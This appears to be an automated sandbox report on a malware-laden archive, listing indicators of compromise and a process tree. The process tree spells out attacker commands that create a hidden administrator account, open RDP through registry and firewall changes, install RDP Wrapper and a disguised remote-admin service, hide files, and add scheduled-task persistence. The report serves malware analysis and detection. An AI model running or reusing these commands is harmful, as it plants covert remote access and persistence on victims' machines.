description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000\Software\Microsoft\Internet Explorer\Main explorer.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\MIME\Database winit.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings wini.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.key TaskMan.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.key\ = "regfile" TaskMan.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings R8.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings 7zFM.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset winit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage winit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.key\ TaskMan.exe Key created \REGISTRY\USER\S-1-5-21-3870231897-2573482396-1083937135-1000_Classes\Local Settings cmd.exe -
NTFS ADS 2 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\ taskhost.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\7zO42F26F08\WinMgmts:\ update.exe -
Runs .reg file with regedit 2 IoCs
pid Process 1060 regedit.exe 4512 regedit.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1616 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2728 schtasks.exe 1092 schtasks.exe 2552 schtasks.exe 3636 schtasks.exe 3464 schtasks.exe 2260 schtasks.exe 6700 schtasks.exe 260 schtasks.exe 3176 schtasks.exe 4480 schtasks.exe 984 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3760 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3148 update.exe 3876 7zFM.exe 3876 7zFM.exe 2976 1111.exe 2976 1111.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3916 rutserv.exe 3916 rutserv.exe 3916 rutserv.exe 3916 rutserv.exe 3916 rutserv.exe 3916 rutserv.exe 3140 rutserv.exe 3140 rutserv.exe 1532 rutserv.exe 1532 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 1912 rutserv.exe 2060 taskhost.exe 2060 taskhost.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe 2196 winit.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3876 7zFM.exe 2060 taskhost.exe 2004 taskhostw.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious behavior: MapViewOfSection 64 IoCs
pid Process 1604 oof.exe 1604 oof.exe 2924 ou55sg33s_1.exe 2924 ou55sg33s_1.exe 4420 oof.exe 4420 oof.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 3220 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 2580 explorer.exe 5492 o37oc73i7.exe 5492 o37oc73i7.exe 5560 explorer.exe 5176 o37oc73i7.exe 5176 o37oc73i7.exe 5240 explorer.exe 3704 o37oc73i7.exe 3704 o37oc73i7.exe 5208 explorer.exe 5208 explorer.exe 3836 o37oc73i7.exe 3836 o37oc73i7.exe 5768 explorer.exe 5768 explorer.exe 3336 o37oc73i7.exe 3336 o37oc73i7.exe 3332 explorer.exe 1448 o37oc73i7.exe 1448 o37oc73i7.exe 6028 explorer.exe 1048 o37oc73i7.exe 1048 o37oc73i7.exe 5396 explorer.exe 3100 o37oc73i7.exe 3100 o37oc73i7.exe 5828 explorer.exe 5828 explorer.exe 5828 explorer.exe 5828 explorer.exe 5828 explorer.exe 5828 explorer.exe 5828 explorer.exe 332 2.exe 5264 2.exe 5264 2.exe 5264 2.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 3876 7zFM.exe Token: 35 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 3572 Clipper.exe Token: SeDebugPrivilege 1396 WinService.exe Token: SeDebugPrivilege 3916 rutserv.exe Token: SeDebugPrivilege 1532 rutserv.exe Token: SeTakeOwnershipPrivilege 1912 rutserv.exe Token: SeTcbPrivilege 1912 rutserv.exe Token: SeTcbPrivilege 1912 rutserv.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 2204 WinService.exe Token: SeDebugPrivilege 3776 taskkill.exe Token: SeDebugPrivilege 2488 taskkill.exe Token: SeDebugPrivilege 5020 taskkill.exe Token: SeAuditPrivilege 3904 svchost.exe Token: SeDebugPrivilege 3028 RDPWInst.exe Token: SeAuditPrivilege 3064 svchost.exe Token: SeLockMemoryPrivilege 3396 MicrosoftHost.exe Token: SeLockMemoryPrivilege 3396 MicrosoftHost.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 4656 svchost.exe Token: SeDebugPrivilege 4360 svchost.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 3116 OnlineInstaller.exe Token: SeLoadDriverPrivilege 3116 OnlineInstaller.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 2940 OnlineInstaller.tmp Token: SeLoadDriverPrivilege 2940 OnlineInstaller.tmp Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 3600 mouse_2.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeSecurityPrivilege 3876 7zFM.exe Token: SeDebugPrivilege 2924 ou55sg33s_1.exe Token: SeRestorePrivilege 2924 ou55sg33s_1.exe Token: SeBackupPrivilege 2924 ou55sg33s_1.exe Token: SeLoadDriverPrivilege 2924 ou55sg33s_1.exe Token: SeCreatePagefilePrivilege 2924 ou55sg33s_1.exe Token: SeShutdownPrivilege 2924 ou55sg33s_1.exe Token: SeTakeOwnershipPrivilege 2924 ou55sg33s_1.exe Token: SeChangeNotifyPrivilege 2924 ou55sg33s_1.exe Token: SeCreateTokenPrivilege 2924 ou55sg33s_1.exe Token: SeMachineAccountPrivilege 2924 ou55sg33s_1.exe Token: SeSecurityPrivilege 2924 ou55sg33s_1.exe Token: SeAssignPrimaryTokenPrivilege 2924 ou55sg33s_1.exe Token: SeCreateGlobalPrivilege 2924 ou55sg33s_1.exe Token: 33 2924 ou55sg33s_1.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 3876 7zFM.exe 5788 30.exe 5788 30.exe 5788 30.exe 5788 30.exe 5788 30.exe -
Suspicious use of SendNotifyMessage 5 IoCs
pid Process 5788 30.exe 5788 30.exe 5788 30.exe 5788 30.exe 5788 30.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 3148 update.exe 2976 1111.exe 2396 wini.exe 2196 winit.exe 3916 rutserv.exe 3140 rutserv.exe 1532 rutserv.exe 1912 rutserv.exe 1876 cheat.exe 3704 taskhost.exe 2004 taskhostw.exe 3992 R8.exe 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 3760 EXCEL.EXE 1048 LtHv0O2KZDK4M637.exe 3116 OnlineInstaller.exe 2940 OnlineInstaller.tmp 2448 SecurityTaskManager_Setup.exe 1160 setup.exe 2300 openme.exe 3668 OpenWith.exe 4836 OpenWith.exe 4408 OpenWith.exe 2252 TaskMan.exe 2252 TaskMan.exe 2252 TaskMan.exe 2252 TaskMan.exe 2252 TaskMan.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 2960 Magic_File_v3_keygen_by_KeygenNinja.exe 884 ymy9m915c99k95m.exe 5780 ymy9m915c99k95m.exe 4872 ymy9m915c99k95m.exe 1928 ymy9m915c99k95m.exe 4896 ymy9m915c99k95m.exe 3668 ymy9m915c99k95m.exe 4280 31.exe 5792 Archive.zip__ccacaxs2tbz2t6ob3e.exe 3876 7zFM.exe 4480 javaw.exe 332 2.exe 5976 3.exe 5976 3.exe 5856 6.exe 2924 5.exe 2720 7.exe 2720 7.exe 6132 13.exe 2992 19.exe 3440 20.exe 732 23.exe 5788 30.exe 6128 15.exe 5564 28.exe 6132 13.exe 5564 28.exe 5380 31.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3876 wrote to memory of 3148 3876 7zFM.exe 78 PID 3876 wrote to memory of 3148 3876 7zFM.exe 78 PID 3876 wrote to memory of 3148 3876 7zFM.exe 78 PID 3876 wrote to memory of 3696 3876 7zFM.exe 81 PID 3876 wrote to memory of 3696 3876 7zFM.exe 81 PID 3876 wrote to memory of 3696 3876 7zFM.exe 81 PID 3876 wrote to memory of 3040 3876 7zFM.exe 82 PID 3876 wrote to memory of 3040 3876 7zFM.exe 82 PID 3876 wrote to memory of 3040 3876 7zFM.exe 82 PID 3876 wrote to memory of 3848 3876 7zFM.exe 83 PID 3876 wrote to memory of 3848 3876 7zFM.exe 83 PID 3876 wrote to memory of 3848 3876 7zFM.exe 83 PID 3876 wrote to memory of 3636 3876 7zFM.exe 84 PID 3876 wrote to memory of 3636 3876 7zFM.exe 84 PID 3876 wrote to memory of 3636 3876 7zFM.exe 84 PID 3876 wrote to memory of 3332 3876 7zFM.exe 85 PID 3876 wrote to memory of 3332 3876 7zFM.exe 85 PID 3876 wrote to memory of 3332 3876 7zFM.exe 85 PID 3876 wrote to memory of 4852 3876 7zFM.exe 86 PID 3876 wrote to memory of 4852 3876 7zFM.exe 86 PID 3876 wrote to memory of 4852 3876 7zFM.exe 86 PID 3848 wrote to memory of 3524 3848 VyprVPN.exe 87 PID 3848 wrote to memory of 3524 3848 VyprVPN.exe 87 PID 3848 wrote to memory of 3524 3848 VyprVPN.exe 87 PID 3848 wrote to memory of 3964 3848 VyprVPN.exe 88 PID 3848 wrote to memory of 3964 3848 VyprVPN.exe 88 PID 3848 wrote to memory of 3964 3848 VyprVPN.exe 88 PID 3524 wrote to memory of 2976 3524 joinResult.exe 90 PID 3524 wrote to memory of 2976 3524 joinResult.exe 90 PID 3524 wrote to memory of 2976 3524 joinResult.exe 90 PID 3524 wrote to memory of 3572 3524 joinResult.exe 92 PID 3524 wrote to memory of 3572 3524 joinResult.exe 92 PID 3148 wrote to memory of 2396 3148 update.exe 94 PID 3148 wrote to memory of 2396 3148 update.exe 94 PID 3148 wrote to memory of 2396 3148 update.exe 94 PID 2396 wrote to memory of 1896 2396 wini.exe 96 PID 2396 wrote to memory of 1896 2396 wini.exe 96 PID 2396 wrote to memory of 1896 2396 wini.exe 96 PID 2396 wrote to memory of 2196 2396 wini.exe 98 PID 2396 wrote to memory of 2196 2396 wini.exe 98 PID 2396 wrote to memory of 2196 2396 wini.exe 98 PID 1896 wrote to memory of 4528 1896 WScript.exe 100 PID 1896 wrote to memory of 4528 1896 WScript.exe 100 PID 1896 wrote to memory of 4528 1896 WScript.exe 100 PID 4528 wrote to memory of 1060 4528 cmd.exe 141 PID 4528 wrote to memory of 1060 4528 cmd.exe 141 PID 4528 wrote to memory of 1060 4528 cmd.exe 141 PID 3572 wrote to memory of 2728 3572 Clipper.exe 104 PID 3572 wrote to memory of 2728 3572 Clipper.exe 104 PID 3572 wrote to memory of 1396 3572 Clipper.exe 107 PID 3572 wrote to memory of 1396 3572 Clipper.exe 107 PID 4528 wrote to memory of 4512 4528 cmd.exe 152 PID 4528 wrote to memory of 4512 4528 cmd.exe 152 PID 4528 wrote to memory of 4512 4528 cmd.exe 152 PID 4528 wrote to memory of 240 4528 cmd.exe 109 PID 4528 wrote to memory of 240 4528 cmd.exe 109 PID 4528 wrote to memory of 240 4528 cmd.exe 109 PID 4528 wrote to memory of 3916 4528 cmd.exe 110 PID 4528 wrote to memory of 3916 4528 cmd.exe 110 PID 4528 wrote to memory of 3916 4528 cmd.exe 110 PID 4528 wrote to memory of 3140 4528 cmd.exe 111 PID 4528 wrote to memory of 3140 4528 cmd.exe 111 PID 4528 wrote to memory of 3140 4528 cmd.exe 111 PID 4528 wrote to memory of 1532 4528 cmd.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
pid Process 4992 attrib.exe 3144 attrib.exe 260 attrib.exe 2456 attrib.exe 1172 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3280
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\241105-dtxrgatbpg_pw_infected.zip"2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3876 -
C:\Users\Admin\AppData\Local\Temp\7zO42F26F08\update.exe"C:\Users\Admin\AppData\Local\Temp\7zO42F26F08\update.exe"3⤵
- Modifies Windows Defender Real-time Protection settings
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Looks for VMWare services registry key.
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3148 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"7⤵
- Windows security bypass
- Hide Artifacts: Hidden Users
- Runs .reg file with regedit
PID:1060
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"7⤵
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:4512
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
PID:240
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3916
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3140
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1532
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*7⤵
- Views/modifies file attributes
PID:4992
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows7⤵
- Views/modifies file attributes
PID:1172
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10007⤵
- Launches sc.exe
PID:2000
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own7⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"7⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:72
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"5⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2196 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat6⤵
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4112
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1876 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"5⤵
- Executes dropped EXE
- NTFS ADS
- Suspicious use of SetWindowsHookEx
PID:3704 -
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2004
-
-
C:\ProgramData\Microsoft\Intel\R8.exeC:\ProgramData\Microsoft\Intel\R8.exe6⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"7⤵PID:396
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "8⤵
- Modifies registry class
PID:3772 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2488
-
-
C:\Windows\SysWOW64\timeout.exetimeout 39⤵
- Delays execution with timeout.exe
PID:1136
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
- System Location Discovery: System Language Discovery
PID:1392
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1496
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5020
-
-
C:\Windows\SysWOW64\timeout.exetimeout 29⤵
- Delays execution with timeout.exe
PID:3396
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"9⤵
- System Location Discovery: System Language Discovery
PID:3140 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "10⤵
- System Location Discovery: System Language Discovery
PID:1776 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f11⤵PID:3480
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f11⤵PID:5000
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2964
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add11⤵PID:2940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add12⤵PID:2252
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125111⤵PID:4124
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add11⤵PID:3868
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add12⤵PID:2916
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add11⤵PID:1840
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add12⤵PID:4564
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add11⤵
- System Location Discovery: System Language Discovery
PID:4540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add12⤵PID:4912
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add11⤵PID:1548
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add12⤵
- System Location Discovery: System Language Discovery
PID:3164
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add11⤵
- System Location Discovery: System Language Discovery
PID:4748 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add12⤵PID:4480
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add11⤵PID:1616
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add12⤵PID:4464
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:4144 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add12⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2988
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add11⤵PID:2620
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add12⤵PID:1984
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:3704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add12⤵PID:1688
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o11⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3028 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2252
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w11⤵
- Executes dropped EXE
PID:4596
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f11⤵
- Hide Artifacts: Hidden Users
PID:4480
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited11⤵PID:5020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited12⤵PID:4492
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"11⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3144
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"11⤵
- Sets file to hidden
- Views/modifies file attributes
PID:260
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"11⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2456
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 29⤵
- Delays execution with timeout.exe
PID:3728
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat6⤵
- Drops file in Drivers directory
PID:1552
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST6⤵
- Scheduled Task/Job: Scheduled Task
PID:984
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3636
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3464
-
-
-
-
